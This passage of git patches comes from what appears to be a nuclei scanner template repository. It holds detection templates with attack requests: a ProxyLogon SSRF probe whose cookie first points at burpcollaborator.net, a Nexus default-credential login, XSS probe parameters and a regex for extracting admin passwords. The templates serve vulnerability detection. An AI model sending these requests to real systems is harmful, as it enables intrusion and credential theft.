X-AnonResource-Backend=burpcollaborator.net/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3; Accept-Language: en Connection: close @@ -31,6 +31,6 @@ requests: - 200 - type: word words: - - "vih3tn1ubo2welhfoqwaenoin9tzho" + - "Burp Collaborator Server" part: body condtion: and From c6deb0c2fc1a0a201add1947db6737c7ab0afc45 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Sat, 6 Mar 2021 13:04:26 +0530 Subject: [PATCH 276/370] misc changes --- cves/2021/CVE-2021-26855.yaml | 11 ++++------- 1 file changed, 4 insertions(+), 7 deletions(-) diff --git a/cves/2021/CVE-2021-26855.yaml b/cves/2021/CVE-2021-26855.yaml index afe13d3e0b..86eefd4bd7 100644 --- a/cves/2021/CVE-2021-26855.yaml +++ b/cves/2021/CVE-2021-26855.yaml @@ -5,10 +5,13 @@ info: author: madrobot severity: critical reference: https://proxylogon.com/#timeline + nse: https://raw.githubusercontent.com/microsoft/CSS-Exchange/main/Security/http-vuln-cve2021-26855.nse + dork: https://www.shodan.io/search?query=vuln%3ACVE-2021-26855 description: | Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-26412, CVE-2021-26854, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065, CVE-2021-27078. tags: cve,cve2021,ssrf,rce,exchange + requests: - raw: - | @@ -19,11 +22,6 @@ requests: Accept-Language: en Connection: close - - # Detection script - # https://raw.githubusercontent.com/microsoft/CSS-Exchange/main/Security/http-vuln-cve2021-26855.nse - # https://www.shodan.io/search?query=vuln%3ACVE-2021-26855 - matchers-condition: and matchers: - type: status @@ -32,5 +30,4 @@ requests: - type: word words: - "Burp Collaborator Server" - part: body - condtion: and + part: body \ No newline at end of file From 4622871ad975db29cbc072e05321f6f60940a882 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 6 Mar 2021 07:35:56 +0000 Subject: [PATCH 277/370] Auto Update README [Sat Mar 6 07:35:56 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 2165399464..4d2fbb620f 100644 --- a/README.md +++ b/README.md @@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | -| cves | 228 | vulnerabilities | 105 | exposed-panels | 100 | +| cves | 229 | vulnerabilities | 105 | exposed-panels | 100 | | exposures | 60 | technologies | 50 | misconfiguration | 50 | | workflows | 23 | miscellaneous | 16 | default-logins | 17 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**71 directories, 684 files**. +**71 directories, 685 files**. From 3e22272fbc49f83e86f3bb0f0e40faf7be680b4c Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Sat, 6 Mar 2021 16:05:21 +0530 Subject: [PATCH 278/370] Adding version print thanks to @@meme-lord --- exposures/configs/phpinfo.yaml | 15 ++++++++++++++- 1 file changed, 14 insertions(+), 1 deletion(-) diff --git a/exposures/configs/phpinfo.yaml b/exposures/configs/phpinfo.yaml index e49e256cce..ecc7dabbdc 100644 --- a/exposures/configs/phpinfo.yaml +++ b/exposures/configs/phpinfo.yaml @@ -2,7 +2,7 @@ id: phpinfo-files info: name: phpinfo Disclosure - author: pd-team & daffainfo + author: pd-team & daffainfo & meme-lord severity: low requests: @@ -25,9 +25,22 @@ requests: - "{{BaseURL}}/infos.php" - "{{BaseURL}}/linusadmin-phpinfo.php" - "{{BaseURL}}/php-info.php" + + matchers-condition: and matchers: - type: word words: - "PHP Extension" - "PHP Version" condition: and + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + group: 1 + regex: + - '>PHP Version <\/td>([0-9.]+)' \ No newline at end of file From 855da4abcdef1cb3245cd3785c3b194ca31c6bd0 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Sat, 6 Mar 2021 16:25:24 +0530 Subject: [PATCH 279/370] Additional references --- cves/2020/CVE-2020-12116.yaml | 4 +--- cves/2021/CVE-2021-26855.yaml | 9 +++++---- 2 files changed, 6 insertions(+), 7 deletions(-) diff --git a/cves/2020/CVE-2020-12116.yaml b/cves/2020/CVE-2020-12116.yaml index 80f6378499..c002797d46 100644 --- a/cves/2020/CVE-2020-12116.yaml +++ b/cves/2020/CVE-2020-12116.yaml @@ -6,9 +6,7 @@ info: severity: high description: Zoho ManageEngine OpManager Stable build before 124196 and Released build before 125125 allows an unauthenticated attacker to read arbitrary files on the server by sending a crafted request. tags: cve,cve2020,zoho,traversal - - # References: - # - https://github.com/BeetleChunks/CVE-2020-12116 + reference: https://github.com/BeetleChunks/CVE-2020-12116 requests: - raw: diff --git a/cves/2021/CVE-2021-26855.yaml b/cves/2021/CVE-2021-26855.yaml index 86eefd4bd7..f07e465fe3 100644 --- a/cves/2021/CVE-2021-26855.yaml +++ b/cves/2021/CVE-2021-26855.yaml @@ -4,13 +4,14 @@ info: name: Exchange Server SSRF Vulnerability author: madrobot severity: critical - reference: https://proxylogon.com/#timeline - nse: https://raw.githubusercontent.com/microsoft/CSS-Exchange/main/Security/http-vuln-cve2021-26855.nse - dork: https://www.shodan.io/search?query=vuln%3ACVE-2021-26855 description: | Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-26412, CVE-2021-26854, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065, CVE-2021-27078. tags: cve,cve2021,ssrf,rce,exchange - + reference: | + - https://proxylogon.com/#timeline + - https://raw.githubusercontent.com/microsoft/CSS-Exchange/main/Security/http-vuln-cve2021-26855.nse + - https://www.shodan.io/search?query=vuln%3ACVE-2021-26855 + - https://gist.github.com/testanull/324546bffab2fe4916d0f9d1f03ffa09 requests: - raw: From 53f92f32dcc7b6dd3a6ada0e34437fba3d59c27a Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Sat, 6 Mar 2021 21:06:03 +0700 Subject: [PATCH 280/370] Create CVE-2015-2080.yaml --- cves/2015/CVE-2015-2080.yaml | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 cves/2015/CVE-2015-2080.yaml diff --git a/cves/2015/CVE-2015-2080.yaml b/cves/2015/CVE-2015-2080.yaml new file mode 100644 index 0000000000..4e23cc8275 --- /dev/null +++ b/cves/2015/CVE-2015-2080.yaml @@ -0,0 +1,26 @@ +id: CVE-2015-2080 + +info: + name: Eclipse Jetty Remote Leakage + author: pikpikcu + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2015-2080 + description: | + The exception handling code in Eclipse Jetty before 9.2.9.v20150224 allows remote attackers to obtain sensitive information from process memory via illegal characters in an HTTP header, aka JetLeak + +requests: + - method: POST + path: + - "{{BaseURL}}/" + headers: + Referer: "\x00" + + matchers-condition: and + matchers: + - type: status + status: + - 400 + - type: word + words: + - "Illegal character 0x0 in state" + part: header From e6e4c27e0fc13ec0c3c0d56e20dbc9e4029371ec Mon Sep 17 00:00:00 2001 From: partyh4rd <31990479+P4rtyH4RD@users.noreply.github.com> Date: Sat, 6 Mar 2021 17:49:32 +0300 Subject: [PATCH 281/370] Update microsoft-echange-server-detect.yaml --- technologies/microsoft-echange-server-detect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/technologies/microsoft-echange-server-detect.yaml b/technologies/microsoft-echange-server-detect.yaml index d06d3b6aa9..b89745b772 100644 --- a/technologies/microsoft-echange-server-detect.yaml +++ b/technologies/microsoft-echange-server-detect.yaml @@ -1,4 +1,4 @@ -id: microsoft-echange-server-detect +id: microsoft-exchange-server-detect info: name: Microsoft Exchange Server Detect From 0d1d8bd832b8fbb55745d38b43b0a2405263bc91 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Sun, 7 Mar 2021 07:51:23 +0000 Subject: [PATCH 282/370] Update exposed-hg.yaml --- exposures/configs/exposed-hg.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/exposures/configs/exposed-hg.yaml b/exposures/configs/exposed-hg.yaml index eb1cdf46bd..9f0e619a3b 100644 --- a/exposures/configs/exposed-hg.yaml +++ b/exposures/configs/exposed-hg.yaml @@ -10,6 +10,7 @@ requests: path: - "{{BaseURL}}/.hg/hgrc" + matchers-condition: and matchers: - type: word words: @@ -19,4 +20,4 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 From bf60c4b7e7ef09368caad7fdb96ad7e6ee2d0e14 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 7 Mar 2021 16:49:03 +0530 Subject: [PATCH 283/370] Update CVE-2015-2080.yaml --- cves/2015/CVE-2015-2080.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2015/CVE-2015-2080.yaml b/cves/2015/CVE-2015-2080.yaml index 4e23cc8275..ca7268eef5 100644 --- a/cves/2015/CVE-2015-2080.yaml +++ b/cves/2015/CVE-2015-2080.yaml @@ -23,4 +23,4 @@ requests: - type: word words: - "Illegal character 0x0 in state" - part: header + part: body From a43828d0be7a6ed17bc7c05c071214531c7e5fa1 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 7 Mar 2021 17:32:25 +0530 Subject: [PATCH 284/370] Update nexus-default-password.yaml --- .../nexus/nexus-default-password.yaml | 26 ++++++++++++------- 1 file changed, 16 insertions(+), 10 deletions(-) diff --git a/default-logins/nexus/nexus-default-password.yaml b/default-logins/nexus/nexus-default-password.yaml index e4b30a3931..aecb665d44 100644 --- a/default-logins/nexus/nexus-default-password.yaml +++ b/default-logins/nexus/nexus-default-password.yaml @@ -2,24 +2,30 @@ id: nexus-default-password info: name: Nexus Default Password - author: pdteam - severity: low + author: pikpikcu + severity: high tags: nexus,dlogin requests: - - method: GET - path: - - "{{BaseURL}}/service/local/authentication/login" - headers: - Content-Type: application/json - Authorization: "Basic YWRtaW46YWRtaW4xMjM=" + - raw: + - | + POST /service/rapture/session HTTP/1.1 + Host: {{Hostname}} + Content-Length: 43 + X-Nexus-UI: true + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + Connection: close + + username=YWRtaW4%3D&password=YWRtaW4xMjM%3D matchers-condition: and matchers: - type: status status: - - 200 + - 204 - type: word words: - - "loggedIn" + - "Server: Nexus" + - "NXSESSIONID" + part: header condition: and From c78596cd76ce11002e57247aaf08e9f4c463f6aa Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 7 Mar 2021 12:03:40 +0000 Subject: [PATCH 285/370] Auto Update README [Sun Mar 7 12:03:40 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 4d2fbb620f..5939adcbe8 100644 --- a/README.md +++ b/README.md @@ -39,11 +39,11 @@ An overview of the nuclei template directory including number of templates assoc | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | | cves | 229 | vulnerabilities | 105 | exposed-panels | 100 | | exposures | 60 | technologies | 50 | misconfiguration | 50 | -| workflows | 23 | miscellaneous | 16 | default-logins | 17 | +| workflows | 23 | miscellaneous | 16 | default-logins | 18 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**71 directories, 685 files**. +**72 directories, 686 files**. From 2f328cecd24cc3ed26aa172917166ce2831f86b5 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Sun, 7 Mar 2021 18:50:45 +0530 Subject: [PATCH 286/370] Added gitlab-snippets --- misconfiguration/gitlab-snippets.yaml | 21 +++++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 misconfiguration/gitlab-snippets.yaml diff --git a/misconfiguration/gitlab-snippets.yaml b/misconfiguration/gitlab-snippets.yaml new file mode 100644 index 0000000000..b3253b81a2 --- /dev/null +++ b/misconfiguration/gitlab-snippets.yaml @@ -0,0 +1,21 @@ +id: gitlab-snippets +info: + name: GitLab public snippets + author: pdteam + severity: info + reference: https://gist.github.com/vysecurity/20311c29d879e0aba9dcffbe72a88b10 + +requests: + - method: GET + path: + - "{{BaseURL}}/explore/snippets" + + matchers-condition: and + matchers: + - type: word + words: + - 'Snippets · Explore · GitLab' + + - type: status + status: + - 200 \ No newline at end of file From f5b7aaa824548fb5b449243ed3747cce573f24cd Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 7 Mar 2021 13:21:09 +0000 Subject: [PATCH 287/370] Auto Update README [Sun Mar 7 13:21:09 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 4d2fbb620f..c3a46ee5ac 100644 --- a/README.md +++ b/README.md @@ -38,12 +38,12 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | | cves | 229 | vulnerabilities | 105 | exposed-panels | 100 | -| exposures | 60 | technologies | 50 | misconfiguration | 50 | +| exposures | 60 | technologies | 50 | misconfiguration | 51 | | workflows | 23 | miscellaneous | 16 | default-logins | 17 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**71 directories, 685 files**. +**71 directories, 686 files**. From 0d75d24bd968981842e95772585823e60c33c635 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 7 Mar 2021 13:22:21 +0000 Subject: [PATCH 288/370] Auto Update README [Sun Mar 7 13:22:21 UTC 2021] :robot: --- README.md | 8 +++++--- 1 file changed, 5 insertions(+), 3 deletions(-) diff --git a/README.md b/README.md index 3680df7028..11188aebd6 100644 --- a/README.md +++ b/README.md @@ -35,13 +35,15 @@ An overview of the nuclei template directory including number of templates assoc
-======= -| exposures | 60 | technologies | 50 | misconfiguration | 50 | +| Templates | Counts | Templates | Counts | Templates | Counts | +| -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | +| cves | 229 | vulnerabilities | 105 | exposed-panels | 100 | +| exposures | 60 | technologies | 50 | misconfiguration | 51 | | workflows | 23 | miscellaneous | 16 | default-logins | 18 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**72 directories, 686 files**. +**72 directories, 687 files**.
From f13243b7438962da737219402753b71648ef7552 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sun, 7 Mar 2021 19:16:30 +0530 Subject: [PATCH 289/370] Create unauthenticated-mongo-express.yaml --- .../unauthenticated-mongo-express.yaml | 22 +++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 misconfiguration/unauthenticated-mongo-express.yaml diff --git a/misconfiguration/unauthenticated-mongo-express.yaml b/misconfiguration/unauthenticated-mongo-express.yaml new file mode 100644 index 0000000000..14ab9922a9 --- /dev/null +++ b/misconfiguration/unauthenticated-mongo-express.yaml @@ -0,0 +1,22 @@ +id: unauthenticated-mongo-express.yaml + +info: + name: Mongo Express Unauthenticated + author: dhiyaneshDK + severity: high + reference: https://www.exploit-db.com/ghdb/5684 + +requests: + - method: GET + path: + - '{{BaseURL}}' + - '{{BaseURL}}/mongo-express/' + + matchers-condition: and + matchers: + - type: word + words: + - 'Home - Mongo Express' + - type: status + status: + - 200 From e4c22f147ea981298bdf2b6295ff7e6b104ee042 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sun, 7 Mar 2021 19:16:57 +0530 Subject: [PATCH 290/370] Create solr-query-dashboard.yaml --- misconfiguration/solr-query-dashboard.yaml | 22 ++++++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 misconfiguration/solr-query-dashboard.yaml diff --git a/misconfiguration/solr-query-dashboard.yaml b/misconfiguration/solr-query-dashboard.yaml new file mode 100644 index 0000000000..f5524980c6 --- /dev/null +++ b/misconfiguration/solr-query-dashboard.yaml @@ -0,0 +1,22 @@ +id: solr-admin-query + +info: + name: Solr Admin Query Page + author: dhiyaneshDK + severity: High + reference: https://www.exploit-db.com/ghdb/5856 + +requests: + - method: GET + path: + - '{{BaseURL}}/admin/' + - '{{BaseURL}}/solr/admin/' + + matchers-condition: and + matchers: + - type: word + words: + - 'Solr admin page' + - type: status + status: + - 200 From 331650749c5425b976c238d1597180bf52de952e Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sun, 7 Mar 2021 19:17:41 +0530 Subject: [PATCH 291/370] Create oki-data.yaml --- exposed-panels/oki-data.yaml | 21 +++++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 exposed-panels/oki-data.yaml diff --git a/exposed-panels/oki-data.yaml b/exposed-panels/oki-data.yaml new file mode 100644 index 0000000000..43bd50169e --- /dev/null +++ b/exposed-panels/oki-data.yaml @@ -0,0 +1,21 @@ +id: oki-data-corporation + +info: + name: Oki Data Corporation + author: dhiyaneshDK + severity: info + reference: https://www.exploit-db.com/ghdb/5937 + +requests: + - method: GET + path: + - '{{BaseURL}}/status.htm' + + matchers-condition: and + matchers: + - type: word + words: + - 'Oki Data Corporation' + - type: status + status: + - 200 From 32ff7b6cf9fbc0b64bafbc42c1645c9e86de115f Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sun, 7 Mar 2021 19:18:07 +0530 Subject: [PATCH 292/370] Create weatherlink.yaml --- exposed-panels/weatherlink.yaml | 21 +++++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 exposed-panels/weatherlink.yaml diff --git a/exposed-panels/weatherlink.yaml b/exposed-panels/weatherlink.yaml new file mode 100644 index 0000000000..b946732f7b --- /dev/null +++ b/exposed-panels/weatherlink.yaml @@ -0,0 +1,21 @@ +id: weatherlink-configuration + +info: + name: WeatherLinkIP Configuration + author: dhiyaneshDK + severity: info + reference: https://www.exploit-db.com/ghdb/6007 + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + words: + - 'WeatherLinkIP Configuration' + - type: status + status: + - 200 From 4516189b45e551c552fff0b3e19e725e000031cb Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sun, 7 Mar 2021 19:18:25 +0530 Subject: [PATCH 293/370] Create wso2-management-console.yaml --- exposed-panels/wso2-management-console.yaml | 21 +++++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 exposed-panels/wso2-management-console.yaml diff --git a/exposed-panels/wso2-management-console.yaml b/exposed-panels/wso2-management-console.yaml new file mode 100644 index 0000000000..e149d890d9 --- /dev/null +++ b/exposed-panels/wso2-management-console.yaml @@ -0,0 +1,21 @@ +id: wso2-management-console + +info: + name: WSO2 Management Console + author: dhiyaneshDK + severity: info + reference: https://www.exploit-db.com/ghdb/5691 + +requests: + - method: GET + path: + - '{{BaseURL}}/carbon/admin/login.jsp' + + matchers-condition: and + matchers: + - type: word + words: + - 'WSO2 Management Console' + - type: status + status: + - 200 From 20dc853b06a487d9d13caaf8949ad0254681745d Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Mon, 8 Mar 2021 05:28:55 +0000 Subject: [PATCH 294/370] Create CVE-2020-14413.yaml --- cves/2020/CVE-2020-14413.yaml | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 cves/2020/CVE-2020-14413.yaml diff --git a/cves/2020/CVE-2020-14413.yaml b/cves/2020/CVE-2020-14413.yaml new file mode 100644 index 0000000000..02f0fa97eb --- /dev/null +++ b/cves/2020/CVE-2020-14413.yaml @@ -0,0 +1,26 @@ +id: CVE-2020-14413 + +info: + name: NeDi 1.9C XSS + author: pikpikcu + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2020-14413 + tags: cve,cve2020,nedi,xss + +requests: + - method: GET + path: + - '{{BaseURL}}/Devices-Config.php?sta=">' + + matchers-condition: and + matchers: + + - type: word + words: + - "" + part: body + condition: and + + - type: status + status: + - 200 From 5aa25c7c9c224f85d280bd4b9cb2009921aabcd7 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Mon, 8 Mar 2021 05:36:37 +0000 Subject: [PATCH 295/370] Create CVE-2020-12256.yaml --- cves/2020/CVE-2020-12256.yaml | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 cves/2020/CVE-2020-12256.yaml diff --git a/cves/2020/CVE-2020-12256.yaml b/cves/2020/CVE-2020-12256.yaml new file mode 100644 index 0000000000..2387a01575 --- /dev/null +++ b/cves/2020/CVE-2020-12256.yaml @@ -0,0 +1,26 @@ +id: CVE-2020-12256 + +info: + name: rConfig 3.9.4 XSS + author: pikpikcu + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2020-12256 + tags: cve,cve2020,rconfig,xss + +requests: + - method: GET + path: + - '{{BaseURL}}/devicemgmt.php?deviceId=">' + + matchers-condition: and + matchers: + + - type: word + words: + - "" + part: body + condition: and + + - type: status + status: + - 200 From 8278e02051596c60643d021ec82ffb2af677a7f0 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Mon, 8 Mar 2021 05:38:54 +0000 Subject: [PATCH 296/370] Create CVE-2020-12259.yaml --- cves/2020/CVE-2020-12259.yaml | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 cves/2020/CVE-2020-12259.yaml diff --git a/cves/2020/CVE-2020-12259.yaml b/cves/2020/CVE-2020-12259.yaml new file mode 100644 index 0000000000..f85d3541d9 --- /dev/null +++ b/cves/2020/CVE-2020-12259.yaml @@ -0,0 +1,26 @@ +id: CVE-2020-12259 + +info: + name: rConfig 3.9.4 XSS + author: pikpikcu + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2020-12259 + tags: cve,cve2020,rconfig,xss + +requests: + - method: GET + path: + - '{{BaseURL}}/configDevice.php?rid=">' + + matchers-condition: and + matchers: + + - type: word + words: + - "" + part: body + condition: and + + - type: status + status: + - 200 From 290aaefa3949217de1eeb6aa07bc557c1d60e918 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Mon, 8 Mar 2021 05:43:56 +0000 Subject: [PATCH 297/370] Create CVE-2020-12258.yaml --- cves/2020/CVE-2020-12258.yaml | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 cves/2020/CVE-2020-12258.yaml diff --git a/cves/2020/CVE-2020-12258.yaml b/cves/2020/CVE-2020-12258.yaml new file mode 100644 index 0000000000..094fac6275 --- /dev/null +++ b/cves/2020/CVE-2020-12258.yaml @@ -0,0 +1,26 @@ +id: CVE-2020-12258 + +info: + name: rConfig 3.9.4 XSS + author: pikpikcu + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2020-12258 + tags: cve,cve2020,rconfig,xss + +requests: + - method: GET + path: + - '{{BaseURL}}/configDevice.php?rid=">' + + matchers-condition: and + matchers: + + - type: word + words: + - "" + part: body + condition: and + + - type: status + status: + - 200 From c633c33bde52ff687f86600343558a3a73e5d5d5 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Mon, 8 Mar 2021 05:49:44 +0000 Subject: [PATCH 298/370] Update CVE-2020-12258.yaml --- cves/2020/CVE-2020-12258.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2020/CVE-2020-12258.yaml b/cves/2020/CVE-2020-12258.yaml index 094fac6275..7b0a9099b8 100644 --- a/cves/2020/CVE-2020-12258.yaml +++ b/cves/2020/CVE-2020-12258.yaml @@ -17,7 +17,7 @@ requests: - type: word words: - - "" + - '' part: body condition: and From 0c761a2e85db2254208dc6b9a0b01b297091d547 Mon Sep 17 00:00:00 2001 From: aron Date: Mon, 8 Mar 2021 08:55:22 +0100 Subject: [PATCH 299/370] No need for internet connection and leak to burp --- cves/2021/CVE-2021-26855.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/cves/2021/CVE-2021-26855.yaml b/cves/2021/CVE-2021-26855.yaml index f07e465fe3..c3a2c484bd 100644 --- a/cves/2021/CVE-2021-26855.yaml +++ b/cves/2021/CVE-2021-26855.yaml @@ -19,7 +19,7 @@ requests: GET /owa/auth/x.js HTTP/1.1 Host: {{Hostname}} User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 - Cookie: X-AnonResource=true; X-AnonResource-Backend=burpcollaborator.net/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3; + Cookie: X-AnonResource=true; X-AnonResource-Backend=localhost/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3; Accept-Language: en Connection: close @@ -27,8 +27,8 @@ requests: matchers: - type: status status: - - 200 + - 500 - type: word words: - - "Burp Collaborator Server" + - "localhost" part: body \ No newline at end of file From 3c01c4df562e8c13e288152bdda92b35ebf0ebe3 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Mon, 8 Mar 2021 13:43:06 +0530 Subject: [PATCH 300/370] minor fix --- cves/2021/CVE-2021-26855.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2021/CVE-2021-26855.yaml b/cves/2021/CVE-2021-26855.yaml index c3a2c484bd..a4e6519d6b 100644 --- a/cves/2021/CVE-2021-26855.yaml +++ b/cves/2021/CVE-2021-26855.yaml @@ -30,5 +30,5 @@ requests: - 500 - type: word words: - - "localhost" - part: body \ No newline at end of file + - 'X-Calculatedbetarget: localhost' + part: header \ No newline at end of file From f3cf303c448309909cc13e1059d2acc0fa101425 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Mon, 8 Mar 2021 11:11:49 +0000 Subject: [PATCH 301/370] Create ruijie-information-disclosure.yaml --- .../ruijie-information-disclosure.yaml | 26 +++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 exposures/configs/ruijie-information-disclosure.yaml diff --git a/exposures/configs/ruijie-information-disclosure.yaml b/exposures/configs/ruijie-information-disclosure.yaml new file mode 100644 index 0000000000..fd38ffb599 --- /dev/null +++ b/exposures/configs/ruijie-information-disclosure.yaml @@ -0,0 +1,26 @@ +id: ruijie-information-disclosure + +info: + name: Ruijie Information Disclosure + author: pikpikcu + severity: high + reference: https://www.cnblogs.com/cHr1s/p/14499858.html + tags: ruijie + +requests: + - method: GET + path: + - '{{BaseURL}}/login.php' + + matchers-condition: and + matchers: + + - type: regex + regex: + - '"role":"super_admin","name":"(.*)","password":"(.*)"' + part: body + condition: and + + - type: status + status: + - 200 From 9e52f250c57d7a6a2c07abd186cb1e8a33496363 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 8 Mar 2021 13:37:21 +0000 Subject: [PATCH 302/370] Auto Update README [Mon Mar 8 13:37:21 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 11188aebd6..a051f87d11 100644 --- a/README.md +++ b/README.md @@ -38,12 +38,12 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | | cves | 229 | vulnerabilities | 105 | exposed-panels | 100 | -| exposures | 60 | technologies | 50 | misconfiguration | 51 | +| exposures | 61 | technologies | 50 | misconfiguration | 51 | | workflows | 23 | miscellaneous | 16 | default-logins | 18 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**72 directories, 687 files**. +**72 directories, 688 files**. From cfc743d23a6ffc21ab81a11f011530e242d6a94a Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 8 Mar 2021 13:58:14 +0000 Subject: [PATCH 303/370] Auto Update README [Mon Mar 8 13:58:14 UTC 2021] :robot: --- README.md | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/README.md b/README.md index a051f87d11..58743a810d 100644 --- a/README.md +++ b/README.md @@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | -| cves | 229 | vulnerabilities | 105 | exposed-panels | 100 | -| exposures | 61 | technologies | 50 | misconfiguration | 51 | +| cves | 229 | vulnerabilities | 105 | exposed-panels | 103 | +| exposures | 61 | technologies | 50 | misconfiguration | 53 | | workflows | 23 | miscellaneous | 16 | default-logins | 18 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**72 directories, 688 files**. +**72 directories, 693 files**. From 3f840d07830a93f07e22e790289ef01435bf758a Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Mon, 8 Mar 2021 19:41:41 +0530 Subject: [PATCH 304/370] minor update --- cves/2021/CVE-2021-26855.yaml | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/cves/2021/CVE-2021-26855.yaml b/cves/2021/CVE-2021-26855.yaml index a4e6519d6b..f5df4f2484 100644 --- a/cves/2021/CVE-2021-26855.yaml +++ b/cves/2021/CVE-2021-26855.yaml @@ -19,7 +19,7 @@ requests: GET /owa/auth/x.js HTTP/1.1 Host: 